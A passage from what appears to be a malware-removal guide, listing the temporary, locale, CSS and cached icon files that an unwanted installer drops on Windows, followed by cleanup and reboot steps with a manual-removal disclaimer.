   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006BB33.log (8 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\CA.locale (161 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\AZ.locale (177 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\KO.locale (141 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ns480180C7\3B1DE5F8_stp.CIS.part (711 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\PA.locale (257 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\RS_RA_V2_M_WIN[1].png (13448 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\EL.locale (235 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\PT.locale (150 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\SR.locale (154 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\HI.locale (284 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\main.css (6 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\ie6_main.css (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\ZH.locale (137 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\TH.locale (264 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\TR.locale (139 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\PS.locale (195 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\SV.locale (157 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\json[1].js (321 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\KA.locale (335 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\progress-bar.css (506 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\MR.locale (289 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\CS.locale (154 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\EN.locale (147 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\fs_bg[1].png (1713 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\LO.locale (305 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\DA.locale (148 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\IS.locale (155 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\MS.locale (143 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\UR.locale (211 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006BB52.log (8 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\images\progress-bg.png (1 bytes)
   %Program Files%\0006BD84.log (8 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ADBlock_icon[1].png (433 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\BG.locale (223 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\HR.locale (154 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\EN[1].png (1421 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1746830794.log (240259 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\VPN_icon[1].png (364 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\checkbox.css (190 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ns480180C7\2E832125_stp\icc.DAT (941 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\TL.locale (163 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\RS_RA_V1_FS[1].png (12328 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ns480180C7\2E832125_stp.CIS (8756 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\SL.locale (160 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\ET.locale (145 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\IT.locale (154 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\AF.locale (154 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\GU.locale (318 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\HT.locale (143 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\JA.locale (195 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\KU.locale (132 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\HE.locale (166 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\Video_icon[1].png (312 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\NE.locale (334 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\SK.locale (164 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\MK.locale (221 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\TE.locale (320 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\FI.locale (143 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\HY.locale (219 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D8501957525982.dat (4861 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0006BCB9.log (8 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\button.css (417 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\Battery_icon[1].png (213 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ns480180C7\2E832125_stp.CIS.part (759 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\UZ.locale (169 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\LV.locale (144 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\images\Loader.gif (10 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\css\sdk-ui\images\button-bg.png (131 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\SQ.locale (149 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\NL.locale (146 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\locale\ZU.locale (138 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd44117047309\csshover3.htc (2 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.